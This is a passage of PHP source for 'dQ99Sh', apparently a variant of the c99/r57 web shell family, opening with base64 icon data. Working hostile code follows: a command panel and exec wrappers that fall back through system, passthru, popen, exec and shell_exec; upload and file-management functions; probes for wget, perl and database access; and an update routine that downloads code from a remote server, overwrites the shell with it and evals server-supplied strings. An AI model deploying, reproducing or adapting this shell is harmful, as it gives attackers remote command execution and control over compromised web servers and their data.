+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7dQ08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LdQ9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDdQ8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"dQEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0Oqp". +"aGeyYpqJlRG/rlwAADs=", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEdQXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" +); +//Untuk optimalisasi ukuran dan kecepatan. +$imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") +); +if (!$getall) { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); +} +else { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
        ");}}}} + natsort($images); + $k = array_keys($images); + echo "
        "; + foreach ($k as $u) {echo $u.":
        ";} + echo "
        "; +} +exit; +} +if ($act == "about") { + echo "
        Credits:
        Idea, leading and coding by tristram [CCTeaM]
        ". + "Beta-testing and some tips by NukLeoN [AnTiSh@Re tEaM]
        ". + "Re-Coding, tricks, html and css by diKi [FeeLCoMz CoMMuNiTy]

        ". + "Report bugs to r57.biz
        "; +} +echo "\n"; +/*** COMMANDS PANEL ***/ +?> +
        .: COMMANDS PANEL :.
        + + + + + + + + + + + + + + + + +
        Command:
        + + + + +
        +
        Quick Commands:
        + + + + +
        +
        Upload:
        + + + +
        +
        PHP Filesystem: + + +\r\n". + "\r\n". + " \r\n". + " \r\n". + "
        \r\n"; + foreach ($sh_sourcez as $e => $o) { + echo "\r\n"; + } + echo "\r\n"; +?> +
        Search File:
        + regexp +
        +
        Create File:
        + Overwrite +
        View File:
        + +
        + + +&1', 'r'); + if ( is_resource($h) ) { + while ( !feof($h) ) { $output .= fread($h, 2096); } + pclose($h); + } + } + elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); } + elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } + elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); } + elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); } + return $output; +} +function dQ99exec2($cmd) { + $output = ""; + if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } + elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); } + elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); } + elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); } + elseif ( enabled("popen") ) { + $h = popen($cmd.' 2>&1', 'r'); + if ( is_resource($h) ) { + while ( !feof($h) ) { $output .= fread($h, 2096); } + pclose($h); + } + } + return $output; +} +function which($pr) { + $path = dQ99exec("which $pr"); + if(!empty($path)) { return $path; } else { return $pr; } +} + +function get_status() { + function showstat($sup,$stat) { + if ($stat=="on") { return "$sup: ON"; } + else { return "$sup: OFF"; } + } + $arrfunc = array( + array("MySQL","mysql_connect"), + array("MSSQL","mssql_connect"), + array("Oracle","ocilogon"), + array("PostgreSQL","pg_connect"), + array("Curl","curl_version"), + ); + $arrcmd = array( + array("Fetch","fetch --help"), + array("Wget","wget --help"), + array("Perl","perl -v"), + ); + + $statinfo = array(); + foreach ($arrfunc as $func) { + if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); } + else { $statinfo[] = showstat($func[0],"off"); } + } + $statinfo[] = (@extension_loaded('sockets'))?showstat("Sockets","on"):showstat("Sockets","off"); + foreach ($arrcmd as $cmd) { + if (dQ99exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); } + else { $statinfo[] = showstat($cmd[0],"off"); } + } + return implode(" ",$statinfo); +} +function showdisfunc() { + if ($disablefunc = @ini_get("disable_functions")) { + return "".$disablefunc.""; + } + else { return "NONE"; } +} +function disp_drives($curdir,$surl) { + $letters = ""; + $v = explode("\\",$curdir); + $v = $v[0]; + foreach (range("A","Z") as $letter) { + $bool = $isdiskette = $letter == "A"; + if (!$bool) { $bool = is_dir($letter.":\\"); } + if ($bool) { + $letters .= " "; + if ($letter.":" != $v) { $letters .= $letter; } + else { $letters .= "".$letter.""; } + $letters .= " "; + } + } + if (!empty($letters)) { Return $letters; } + else {Return "None"; } +} +function disp_freespace($curdrv) { + $free = @disk_free_space($curdrv); + $total = @disk_total_space($curdrv); + if ($free === FALSE) { $free = 0; } + if ($total === FALSE) { $total = 0; } + if ($free < 0) { $free = 0; } + if ($total < 0) { $total = 0; } + $used = $total-$free; + $free_percent = round(100/($total/$free),2)."%"; + $free = view_size($free); + $total = view_size($total); + return "$free of $total ($free_percent)"; +} +## dQ99Sh UPDATE FUNCTIONS ## +function dQ99getsource($fn) { + global $dQ99sh_sourcesurl; + $array = array( + "dQ99sh.php" => "dQ99sh.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($dQ99sh_sourcesurl.$name);} + else {return FALSE;} +} +function dQ99sh_getupdate($update = TRUE) { + $url = $GLOBALS["dQ99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0"); + $data = @file_get_contents($url); + if (!$data) { return "Can't connect to update-server!"; } + else { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") { + $string = explode("|",$string); + if ($update) { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download dQ99shell.php manually here.";} + else { + fwrite($fp,$source); + fclose($fp); + return "Update completed!"; + } + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") { + eval($string); + return 1; + } + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +function dQ99_buff_prepare() { + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +function dQ99_sess_put($data) { + global $sess_cookie; + global $sess_data; + dQ99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +## END dQ99Sh UPDATE FUNCTIONS ## +## FILESYSTEM FUNCTIONS ## +function fs_copy_dir($d,$t) { + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) { + if (($o != ".") and ($o != "..")) { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +function fs_copy_obj($d,$t) { + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) { return copy($d,$t); } + else { return FALSE; } +} +function fs_move_dir($d,$t) { + + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) { + if (($o != ".") and ($o != "..")) { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +function fs_move_obj($d,$t) { + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +function fs_rmdir($d) { + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) { + if (($o != ".") and ($o != "..")) { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +function fs_rmobj($o) { + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +## END FILESYSTEM FUNCTIONS ## +function onphpshutdown() { + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function dQ99shexit() { onphpshutdown(); exit; } + +function dQ99fsearch($d) { + global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) { + if($f != "." && $f != "..") { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {dQ99fsearch($d.$f);} + } + else { + $search_i_f++; + if ($bool) { + if (!empty($a["text"])) { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +function view_size($size) { + if (!is_numeric($size)) { return FALSE; } + else { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);} +function view_perms($mode) { + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + return $type.join("",$owner).join("",$group).join("",$world); +} +function parse_perms($mode) { + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return 